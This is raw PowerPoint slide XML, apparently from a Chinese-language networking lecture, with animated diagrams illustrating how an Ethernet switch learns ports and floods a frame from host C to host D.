          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1573" y="2213"/>
              <a:ext cx="28" cy="18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7614" name="Line 62"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4456113" y="2036763"/>
            <a:ext cx="2046287" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="5715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7615" name="Line 63"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4005263" y="2452688"/>
            <a:ext cx="1587" cy="84296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64"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3471863" y="3409950"/>
            <a:ext cx="1001712" cy="595313"/>
            <a:chOff x="2187" y="2148"/>
            <a:chExt cx="631" cy="375"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14397" name="Line 65"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="2187" y="2148"/>
              <a:ext cx="236" cy="147"/>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8" name="Line 66"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="2397" y="2285"/>
              <a:ext cx="72" cy="2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99" name="Line 67"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2698" y="2194"/>
              <a:ext cx="120" cy="19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7620" name="Rectangle 68"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7140575" y="3149600"/>
            <a:ext cx="1117600" cy="363538"/>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7609"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(left)">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4076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7610"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(left)">
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4076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7614"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(left)">
                                      <p:cBhvr>
                                        <p:cTn id="22" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4076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76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07615"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(up)">
                                      <p:cBhvr>
                                        <p:cTn id="31" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4076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07556">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="41" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="40755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7556">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7556">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="45" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="407556">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07556">
                                            <p:txEl>
                                              <p:pRg st="1" end="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07556">
                                            <p:txEl>
                                              <p:pRg st="2" end="2"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="49" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="40755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075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07556">
                                            <p:txEl>
                                              <p:pRg st="3" end="3"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="55" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="407556">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755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609" grpId="0" animBg="1"/>
      <p:bldP spid="407610" grpId="0" animBg="1"/>
      <p:bldP spid="407614" grpId="0" animBg="1"/>
      <p:bldP spid="407615" grpId="0" animBg="1"/>
      <p:bldP spid="4076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95"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6396"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1FB24AF3-D0CB-4F2F-BE0B-E61DE1977EA2}"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5373" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="495300" y="0"/>
            <a:ext cx="7772400" cy="1143000"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1" smtClean="0"/>
              <a:t>交换机举例</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3600" b="1" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15374" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="550863" y="1139825"/>
            <a:ext cx="7772400" cy="555625"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="ZapfDingbats"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" smtClean="0"/>
              <a:t>假设</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" smtClean="0"/>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" smtClean="0"/>
              <a:t>发送数据帧到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" smtClean="0"/>
              <a:t>D</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="409604" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="714375" y="4664075"/>
            <a:ext cx="77724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交换机接收来自</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的数据帧</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记录</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所对应的接口号</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="仿宋_GB2312"/>
                <a:cs typeface="仿宋_GB2312"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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因为</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不在交换表中</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="仿宋_GB2312"/>
                <a:cs typeface="仿宋_GB2312"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="仿宋_GB2312"/>
                <a:cs typeface="仿宋_GB2312"/>
              </a:rPr>
              <a:t>交换机将转发数据帧到接口</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="仿宋_GB2312"/>
                <a:cs typeface="仿宋_GB2312"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="仿宋_GB2312"/>
                <a:cs typeface="仿宋_GB2312"/>
              </a:rPr>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="仿宋_GB2312"/>
                <a:cs typeface="仿宋_GB2312"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="仿宋_GB2312"/>
              <a:cs typeface="仿宋_GB2312"/>
            </a:endParaRPr>
          </a:p>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数据帧被</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接收 </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="仿宋_GB2312"/>
              <a:cs typeface="仿宋_GB2312"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15376"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6038" y="33401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2" name="Object 6"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1692275" y="3789363"/>
          <a:ext cx="409575" cy="319087"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s638431" name="Clip" r:id="rId2" imgW="408940" imgH="318770" progId="MS_ClipArt_Gallery.2">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Clip" r:id="rId2" imgW="408940" imgH="318770" progId="MS_ClipArt_Gallery.2">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="0" name="图片 63843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8936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7"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4259263" y="3800475"/>
          <a:ext cx="409575" cy="319088"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s638432" name="Clip" r:id="rId4" imgW="408940" imgH="318770" progId="MS_ClipArt_Gallery.2">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Clip" r:id="rId4" imgW="408940" imgH="318770" progId="MS_ClipArt_Gallery.2">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="0" name="图片 63843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3" y="3800475"/>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8"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5032375" y="3759200"/>
          <a:ext cx="407988" cy="319088"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s638433" name="Clip" r:id="rId6" imgW="407670" imgH="318770" progId="MS_ClipArt_Gallery.2">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Clip" r:id="rId6" imgW="407670" imgH="318770" progId="MS_ClipArt_Gallery.2">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="0" name="图片 6384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37592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9"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1247775" y="3311525"/>
          <a:ext cx="407988" cy="319088"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s638434" name="Clip" r:id="rId8" imgW="407670" imgH="318770" progId="MS_ClipArt_Gallery.2">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Clip" r:id="rId8" imgW="407670" imgH="318770" progId="MS_ClipArt_Gallery.2">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="0" name="图片 6384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7775" y="331152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77"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3875" y="33480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4238" y="3338513"/>
            <a:ext cx="457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6" name="Object 12"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3213100" y="3662363"/>
          <a:ext cx="407988" cy="319087"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s638435" name="Clip" r:id="rId12" imgW="342900" imgH="260985" progId="MS_ClipArt_Gallery.2">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Clip" r:id="rId12" imgW="342900" imgH="260985" progId="MS_ClipArt_Gallery.2">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="0" name="图片 63843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3100" y="366236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13"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3627438" y="4094163"/>
          <a:ext cx="407987" cy="319087"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s638436" name="Clip" r:id="rId14" imgW="342900" imgH="260985" progId="MS_ClipArt_Gallery.2">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Clip" r:id="rId14" imgW="342900" imgH="260985" progId="MS_ClipArt_Gallery.2">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="0" name="图片 63843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4094163"/>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14"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6418263" y="3633788"/>
          <a:ext cx="407987" cy="319087"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s638437" name="Clip" r:id="rId16" imgW="407670" imgH="318770" progId="MS_ClipArt_Gallery.2">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Clip" r:id="rId16" imgW="407670" imgH="318770" progId="MS_ClipArt_Gallery.2">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="0" name="图片 63843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8263" y="36337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9" name="Object 15"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5702300" y="3967163"/>
          <a:ext cx="407988" cy="320675"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s638438" name="Clip" r:id="rId18" imgW="407670" imgH="320675" progId="MS_ClipArt_Gallery.2">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Clip" r:id="rId18" imgW="407670" imgH="320675" progId="MS_ClipArt_Gallery.2">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="0" name="图片 63843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300" y="3967163"/>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6"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2263775" y="3825875"/>
          <a:ext cx="407988" cy="319088"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s638439" name="Clip" r:id="rId20" imgW="342900" imgH="260985" progId="MS_ClipArt_Gallery.2">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Clip" r:id="rId20" imgW="342900" imgH="260985" progId="MS_ClipArt_Gallery.2">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="0" name="图片 638438"/>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63775" y="382587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9" name="Line 17"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="1633538" y="3503613"/>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0" name="Line 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="2000250" y="3546475"/>
            <a:ext cx="258763" cy="284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1" name="Line 19"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2398713" y="3573463"/>
            <a:ext cx="68262" cy="265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2" name="Line 20"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="3581400" y="3538538"/>
            <a:ext cx="328613" cy="195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3" name="Line 21"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="3878263" y="3556000"/>
            <a:ext cx="120650" cy="528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4" name="Line 22"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4168775" y="3503613"/>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5" name="Line 23"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="5381625" y="3573463"/>
            <a:ext cx="406400"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6" name="Line 24"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="5857875" y="3546475"/>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87" name="Line 25"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5976938" y="3476625"/>
            <a:ext cx="487362"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5388" name="Group 26"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3905250" y="2176463"/>
            <a:ext cx="509588" cy="252412"/>
            <a:chOff x="2460" y="1371"/>
            <a:chExt cx="321" cy="159"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15432" name="Line 27"/>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5433" name="Picture 28"/>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34" name="Group 29"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="2576" y="1407"/>
              <a:ext cx="84" cy="62"/>
              <a:chOff x="2576" y="1407"/>
              <a:chExt cx="84" cy="62"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="15435" name="Line 30"/>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436" name="Line 31"/>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5389" name="Line 32"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="2389188" y="2409825"/>
            <a:ext cx="1581150" cy="9699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90" name="Line 33"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4117975" y="2401888"/>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91" name="Line 34"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1" flipV="1">
            <a:off x="4265613" y="2357438"/>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392" name="Rectangle 35"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2530475" y="3244850"/>
            <a:ext cx="817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5393" name="Rectangle 36"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4252913" y="32019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5394" name="Rectangle 37"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6069013" y="31511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5395" name="Rectangle 38"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4368800" y="2016125"/>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5396" name="Rectangle 39"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="965200" y="33035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5397" name="Rectangle 40"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1646238" y="4076700"/>
            <a:ext cx="328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5398" name="Rectangle 41"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2303463" y="40894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5399" name="Rectangle 42"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3114675" y="39100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5400" name="Rectangle 43"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3990975" y="4167188"/>
            <a:ext cx="327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5401" name="Rectangle 44"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4633913" y="3883025"/>
            <a:ext cx="322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5402" name="Rectangle 45"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5175250" y="4025900"/>
            <a:ext cx="33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5403" name="Rectangle 46"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6038850" y="41021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5404" name="Rectangle 47"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6784975" y="3548063"/>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5405" name="Line 48"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6813550" y="2319338"/>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406" name="Line 49"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7688263" y="1970088"/>
            <a:ext cx="0" cy="237966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407" name="Rectangle 50"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7670800" y="1908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a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>接口</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15408" name="Rectangle 51"/>
